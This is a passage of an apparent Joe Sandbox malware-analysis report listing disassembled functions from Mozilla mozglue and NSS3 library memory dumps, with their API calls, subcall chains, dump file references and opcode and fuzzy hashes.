                                                                                            • Part of subcall function 6CA67670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CA685B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CA6767F
                                                                                            • Part of subcall function 6CA67670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CA685B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CA67693
                                                                                            • Part of subcall function 6CA67670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CA685B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CA676A7
                                                                                          • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CA685B2
                                                                                            • Part of subcall function 6CA45E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CA45EDB
                                                                                            • Part of subcall function 6CA45E90: memset.VCRUNTIME140(6CA87765,000000E5,55CCCCCC), ref: 6CA45F27
                                                                                            • Part of subcall function 6CA45E90: LeaveCriticalSection.KERNEL32(?), ref: 6CA45FB2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                          • String ID:
                                                                                          • API String ID: 2666944752-0
                                                                                          • Opcode ID: 8658f9b07c48ac36ad3aca27298442110a1878b20183c8eaf9ce47a3ca093f91
                                                                                          • Instruction ID: 4ffad516f5ad4e660e8a075f0135b6e4b63d57e0d3d1317e57a6d598d24d8119
                                                                                          • Opcode Fuzzy Hash: 8658f9b07c48ac36ad3aca27298442110a1878b20183c8eaf9ce47a3ca093f91
                                                                                          • Instruction Fuzzy Hash: E92160742007029FEB14DB66D888A5B77B9AF4530DF14482DE55BC3B41DB31E989CB51
                                                                                          Function 6CB58C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB58C1B
                                                                                          • EnterCriticalSection.KERNEL32 ref: 6CB58C34
                                                                                          • PL_ArenaAllocate.NSS3 ref: 6CB58C65
                                                                                          • PR_Unlock.NSS3 ref: 6CB58C9C
                                                                                          • PR_Unlock.NSS3 ref: 6CB58CB6
                                                                                            • Part of subcall function 6CBEDD70: TlsGetValue.KERNEL32 ref: 6CBEDD8C
                                                                                            • Part of subcall function 6CBEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CBEDDB4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                          • String ID: KRAM
                                                                                          • API String ID: 4127063985-3815160215
                                                                                          • Opcode ID: d6db147d858ae5491b6f06a318bfdec03bf9fcc771d2523cd2c1b8a8356b806b
                                                                                          • Instruction ID: 00ab9f5c2cc331ba8f109e2640a8e164262880439a8e5ce05e4fc166e4ebcd9a
                                                                                          • Opcode Fuzzy Hash: d6db147d858ae5491b6f06a318bfdec03bf9fcc771d2523cd2c1b8a8356b806b
                                                                                          • Instruction Fuzzy Hash: 64218BB1A156418FD700AF78C484569BBF4FF45308F45896ED898CB711EB32D8AACB82
                                                                                          Function 6CC52C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_EnterMonitor.NSS3 ref: 6CC52CA0
                                                                                          • PR_ExitMonitor.NSS3 ref: 6CC52CBE
                                                                                          • calloc.MOZGLUE(00000001,00000014), ref: 6CC52CD1
                                                                                          • strdup.MOZGLUE(?), ref: 6CC52CE1
                                                                                          • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CC52D27
                                                                                          Strings
                                                                                          • Loaded library %s (static lib), xrefs: 6CC52D22
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                          • String ID: Loaded library %s (static lib)
                                                                                          • API String ID: 3511436785-2186981405
                                                                                          • Opcode ID: 01f0c5b4726720da16db7b476b02363c6606e7bab4b39ad166efe8a558fe2dcc
                                                                                          • Instruction ID: 2d2d1588e1ac5d0cb31e1baad06c029adf57ed30e5128daeab53bb312bd1972c
                                                                                          • Opcode Fuzzy Hash: 01f0c5b4726720da16db7b476b02363c6606e7bab4b39ad166efe8a558fe2dcc
                                                                                          • Instruction Fuzzy Hash: B911E2B1B01250DFEB008F5AE858A6A77F4EB4535DF84802DD809C7B51F731E828CBA1
                                                                                          Function 6CBA0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB487ED,00000800,6CB3EF74,00000000), ref: 6CBA1000
                                                                                          • PR_NewLock.NSS3(?,00000800,6CB3EF74,00000000), ref: 6CBA1016
                                                                                            • Part of subcall function 6CC098D0: calloc.MOZGLUE(00000001,00000084,6CB30936,00000001,?,6CB3102C), ref: 6CC098E5
                                                                                          • PL_InitArenaPool.NSS3(00000000,security,6CB487ED,00000008,?,00000800,6CB3EF74,00000000), ref: 6CBA102B
                                                                                          • TlsGetValue.KERNEL32(00000000,?,?,6CB487ED,00000800,6CB3EF74,00000000), ref: 6CBA1044
                                                                                          • free.MOZGLUE(00000000,?,00000800,6CB3EF74,00000000), ref: 6CBA1064
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: calloc$ArenaInitLockPoolValuefree
                                                                                          • String ID: security
                                                                                          • API String ID: 3379159031-3315324353
                                                                                          • Opcode ID: 477e22e8e5d286b656eb03a910acc065e3ee091f161ea15745cef4c1c247bcc6
                                                                                          • Instruction ID: 913a3bd411b7752299659eb29c8572cb0fe4f2b78a7ca1417379902e1e514da7
                                                                                          • Opcode Fuzzy Hash: 477e22e8e5d286b656eb03a910acc065e3ee091f161ea15745cef4c1c247bcc6
                                                                                          • Instruction Fuzzy Hash: 57012530A082D0DBE7702FAE9C0864A7A7CFF02799F090115E888D7A51EB60C156DBD6
                                                                                          Function 6CBCAFB0 Relevance: 9.4, APIs: 6, Instructions: 355memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140(?,00000000,00000140), ref: 6CBCAFF4
                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6CBCB02F
                                                                                            • Part of subcall function 6CBCEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6CBCEE85
                                                                                            • Part of subcall function 6CBCEE50: realloc.MOZGLUE(1BAF25D8,?), ref: 6CBCEEAE
                                                                                            • Part of subcall function 6CBCEE50: PORT_Alloc_Util.NSS3(?), ref: 6CBCEEC5
                                                                                            • Part of subcall function 6CBCEE50: htonl.WSOCK32(?), ref: 6CBCEEE3
                                                                                            • Part of subcall function 6CBCEE50: htonl.WSOCK32(00000000,?), ref: 6CBCEEED
                                                                                            • Part of subcall function 6CBCEE50: memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6CBCEF01
                                                                                            • Part of subcall function 6CBCEF30: PR_SetError.NSS3(FFFFE013,00000000,?,6CBEA4A1,?,00000000,?,00000001), ref: 6CBCEF6D
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CBCB2F7
                                                                                            • Part of subcall function 6CBCEF30: htonl.WSOCK32(00000000,?,6CBEA4A1,?,00000000,?,00000001), ref: 6CBCEFE4
                                                                                            • Part of subcall function 6CBCEF30: htonl.WSOCK32(?,00000000,?,6CBEA4A1,?,00000000,?,00000001), ref: 6CBCEFF1
                                                                                            • Part of subcall function 6CBCEF30: memcpy.VCRUNTIME140(?,?,6CBEA4A1,?,00000000,?,6CBEA4A1,?,00000000,?,00000001), ref: 6CBCF00B
                                                                                            • Part of subcall function 6CBCEF30: memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6CBEA4A1,?,00000000,?,00000001), ref: 6CBCF027
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,?,000003E8,00000000), ref: 6CBCB339
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,000003E8,00000000), ref: 6CBCB357
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CBCB3A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: htonlmemcpy$ErrorUtil$Item_$AllocAlloc_Unothrow_t@std@@@ValueZfree__ehfuncinfo$??2@memsetrealloc
                                                                                          • String ID:
                                                                                          • API String ID: 1535029029-0
                                                                                          • Opcode ID: fdd4e43fa8f599078408fee6fa0f55297df740ccd45451c0b1d946ce66a5207c
                                                                                          • Instruction ID: 8bb2c3ad029e4c51a6e1c24a73848c0b7e2a29e6484ac3d7556ae0a5cf804c86
                                                                                          • Opcode Fuzzy Hash: fdd4e43fa8f599078408fee6fa0f55297df740ccd45451c0b1d946ce66a5207c
                                                                                          • Instruction Fuzzy Hash: 21B1C5B1B44381ABF3109A358C82FAF72EDEF4474CF040919FE6696682F771E51486A3
                                                                                          Function 6CBE2E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CBE3046
                                                                                            • Part of subcall function 6CBCEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6CBCEE85
                                                                                          • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6CBB7FFB), ref: 6CBE312A
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CBE3154
                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CBE2E8B
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                            • Part of subcall function 6CBCF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6CBB9BFF,?,00000000,00000000), ref: 6CBCF134
                                                                                          • memcpy.VCRUNTIME140(8B3C75C0,?,6CBB7FFA), ref: 6CBE2EA4
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBE317B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Error$memcpy$K11_Value
                                                                                          • String ID:
                                                                                          • API String ID: 2334702667-0
                                                                                          • Opcode ID: b26e4a8d7e00af0fd78e37880d6895c85de956ee1be76f5591160824976ca9f3
                                                                                          • Instruction ID: 0b734f4be6370feca3d96ed720b2dee7df8ee7defaa1698de26d2985dee9bacd
                                                                                          • Opcode Fuzzy Hash: b26e4a8d7e00af0fd78e37880d6895c85de956ee1be76f5591160824976ca9f3
                                                                                          • Instruction Fuzzy Hash: DAA1CB71A002599FDF24CF54CC80BEAB7B5EF49708F048199E9496B781E731AE85CF92
                                                                                          Function 6CBAED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CBAED6B
                                                                                          • PORT_Alloc_Util.NSS3(00000000), ref: 6CBAEDCE
                                                                                            • Part of subcall function 6CBA0BE0: malloc.MOZGLUE(6CB98D2D,?,00000000,?), ref: 6CBA0BF8
                                                                                            • Part of subcall function 6CBA0BE0: TlsGetValue.KERNEL32(6CB98D2D,?,00000000,?), ref: 6CBA0C15
                                                                                          • free.MOZGLUE(00000000,?,?,?,?,6CBAB04F), ref: 6CBAEE46
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CBAEECA
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CBAEEEA
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CBAEEFB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                          • String ID:
                                                                                          • API String ID: 3768380896-0
                                                                                          • Opcode ID: 1dbf8cb736a1be59842b9d2dab7603391730c6b244501da1dc07437b832f46b8
                                                                                          • Instruction ID: fc4aab0bcd5b06569f7798891e8e44bf38a6bf5297e2d0cca75df2551db7bc6e
                                                                                          • Opcode Fuzzy Hash: 1dbf8cb736a1be59842b9d2dab7603391730c6b244501da1dc07437b832f46b8
                                                                                          • Instruction Fuzzy Hash: D2818FB5A042859FEB14CF99D880AAF77F5FF88308F144428E89597751D731E826CBA2
                                                                                          Function 6CA814A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6CA814C5
                                                                                          • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CA814E2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6CA81546
                                                                                          • InitializeConditionVariable.KERNEL32(?), ref: 6CA815BA
                                                                                          • free.MOZGLUE(?), ref: 6CA816B4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                          • String ID:
                                                                                          • API String ID: 1909280232-0
                                                                                          • Opcode ID: 445db9d3faad5af931d6b41828a8365574317dadcaa1376cc3b02bfd98c32ad4
                                                                                          • Instruction ID: 3c7f2e7c1e796da0f1c3a44bda52d17c7feb447b82479d53e997bbc5d48bc40a
                                                                                          • Opcode Fuzzy Hash: 445db9d3faad5af931d6b41828a8365574317dadcaa1376cc3b02bfd98c32ad4
                                                                                          • Instruction Fuzzy Hash: 6B610476A017059FDB258F20D980BEEB7B0BF89308F04851CED9A57711EB31E989CB91
                                                                                          Function 6CBACCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6CBAC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CBADAE2,?), ref: 6CBAC6C2
                                                                                          • PR_Now.NSS3 ref: 6CBACD35
                                                                                            • Part of subcall function 6CC09DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC50A27), ref: 6CC09DC6
                                                                                            • Part of subcall function 6CC09DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC50A27), ref: 6CC09DD1
                                                                                            • Part of subcall function 6CC09DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC09DED
                                                                                            • Part of subcall function 6CB96C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB41C6F,00000000,00000004,?,?), ref: 6CB96C3F
                                                                                          • PR_GetCurrentThread.NSS3 ref: 6CBACD54
                                                                                            • Part of subcall function 6CC09BF0: TlsGetValue.KERNEL32(?,?,?,6CC50A75), ref: 6CC09C07
                                                                                            • Part of subcall function 6CB97260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB41CCC,00000000,00000000,?,?), ref: 6CB9729F
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CBACD9B
                                                                                          • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CBACE0B
                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CBACE2C
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA10F3
                                                                                            • Part of subcall function 6CBA10C0: EnterCriticalSection.KERNEL32(?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA110C
                                                                                            • Part of subcall function 6CBA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1141
                                                                                            • Part of subcall function 6CBA10C0: PR_Unlock.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1182
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA119C
                                                                                          • PORT_ArenaMark_Util.NSS3(00000000), ref: 6CBACE40
                                                                                            • Part of subcall function 6CBA14C0: TlsGetValue.KERNEL32 ref: 6CBA14E0
                                                                                            • Part of subcall function 6CBA14C0: EnterCriticalSection.KERNEL32 ref: 6CBA14F5
                                                                                            • Part of subcall function 6CBA14C0: PR_Unlock.NSS3 ref: 6CBA150D
                                                                                            • Part of subcall function 6CBACEE0: PORT_ArenaMark_Util.NSS3(?,6CBACD93,?), ref: 6CBACEEE
                                                                                            • Part of subcall function 6CBACEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CBACD93,?), ref: 6CBACEFC
                                                                                            • Part of subcall function 6CBACEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CBACD93,?), ref: 6CBACF0B
                                                                                            • Part of subcall function 6CBACEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CBACD93,?), ref: 6CBACF1D
                                                                                            • Part of subcall function 6CBACEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CBACD93,?), ref: 6CBACF47
                                                                                            • Part of subcall function 6CBACEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CBACD93,?), ref: 6CBACF67
                                                                                            • Part of subcall function 6CBACEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CBACD93,?,?,?,?,?,?,?,?,?,?,?,6CBACD93,?), ref: 6CBACF78
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                          • String ID:
                                                                                          • API String ID: 3748922049-0
                                                                                          • Opcode ID: 82db63e0a50fd1194cbc814d50dd0b0f57fe91e526ca04153848c97abd574d13
                                                                                          • Instruction ID: 86de6c6f7b8e6ce546f33f81d6f60d76fc85683c080e089b2b4a1c278ccf0dcb
                                                                                          • Opcode Fuzzy Hash: 82db63e0a50fd1194cbc814d50dd0b0f57fe91e526ca04153848c97abd574d13
                                                                                          • Instruction Fuzzy Hash: 1651B676A081509FEB10DFA9DC40BAA77F4EF48348F250524D99597B41EB32F906CB92
                                                                                          Function 6CB7EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CB7EF38
                                                                                            • Part of subcall function 6CB69520: PK11_IsLoggedIn.NSS3(00000000,?,6CB9379E,?,00000001,?), ref: 6CB69542
                                                                                          • PK11_Authenticate.NSS3(?,00000001,?), ref: 6CB7EF53
                                                                                            • Part of subcall function 6CB84C20: TlsGetValue.KERNEL32 ref: 6CB84C4C
                                                                                            • Part of subcall function 6CB84C20: EnterCriticalSection.KERNEL32(?), ref: 6CB84C60
                                                                                            • Part of subcall function 6CB84C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB84CA1
                                                                                            • Part of subcall function 6CB84C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CB84CBE
                                                                                            • Part of subcall function 6CB84C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB84CD2
                                                                                            • Part of subcall function 6CB84C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB84D3A
                                                                                          • PR_GetCurrentThread.NSS3 ref: 6CB7EF9E
                                                                                            • Part of subcall function 6CC09BF0: TlsGetValue.KERNEL32(?,?,?,6CC50A75), ref: 6CC09C07
                                                                                          • free.MOZGLUE(00000000), ref: 6CB7EFC3
                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB7F016
                                                                                          • free.MOZGLUE(00000000), ref: 6CB7F022
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
